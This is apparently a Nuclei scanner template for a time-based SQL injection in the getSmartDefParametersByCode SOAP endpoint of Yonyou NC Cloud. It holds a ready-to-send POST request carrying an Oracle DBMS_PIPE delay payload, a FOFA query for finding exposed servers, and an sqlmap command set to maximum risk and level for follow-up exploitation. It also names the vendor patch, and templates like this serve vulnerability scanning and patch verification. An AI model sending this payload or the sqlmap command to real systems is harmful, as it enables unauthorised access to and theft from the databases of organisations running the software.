id: yonyou-nc-cloud-getSmartDefParametersByCode-sqli
info:
  name: 用友 NC Cloud ISmartQueryWebService 接口 getSmartDefParametersByCode - sqli
  author: leadlife
  severity: high
  description: 用友 NC cloud getSmartDefParametersByCode 接口存在SQL注入漏洞，该漏洞允许攻击者在应用程序的数据库查询中注入恶意的SQL代码。通常发生在应用程序未对用户输入进行充分验证和过滤。
  reference:
    - todo
  metadata:
    verified: true
    fofa-query: app="用友-NC-Cloud"
    sqlmap: sqlmap -r sql.txt --random-agent --batch --dbms=Oracle --risk 3 --level 5
    tips: not need "||" 直接 *
    repair: 官方已发布安全补丁，请及时安装，补丁下载地址：https://security.yonyou.com/#/home
  tags: sqli,yonyou,nccloud,oa,time

http:
  - raw:
      - |
        GET /nccloud HTTP/1.1
        Host: {{Hostname}}
      
      - |+
        @timeout: 15s
        POST /uapws/service/nc.itf.smart.ISmartQueryWebService HTTP/1.1
        Host: {{Hostname}}
        Pragma: no-cache
        Cache-Control: no-cache
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Content-Type: text/xml;charset=UTF-8
        SOAPAction: urn:getSmartDefParametersByCode
        Content-Length: 483

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ism="http://smart.itf.nc/ISmartQueryWebService">
          <soapenv:Header/>
          <soapenv:Body>
              <ism:getSmartDefParametersByCode>
                <ism:string>'||(SELECT CHR(90)||CHR(99)||CHR(71)||CHR(77) FROM DUAL WHERE 2338=2338 AND 7280=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(113)||CHR(87)||CHR(101),4))||'</ism:string>
              </ism:getSmartDefParametersByCode>
          </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: dsl
        dsl:
          - contains(header_1,'nccloud')
          - status_code_2 == 200
          - duration_2 >= 4 && duration_2 < 7
        condition: and
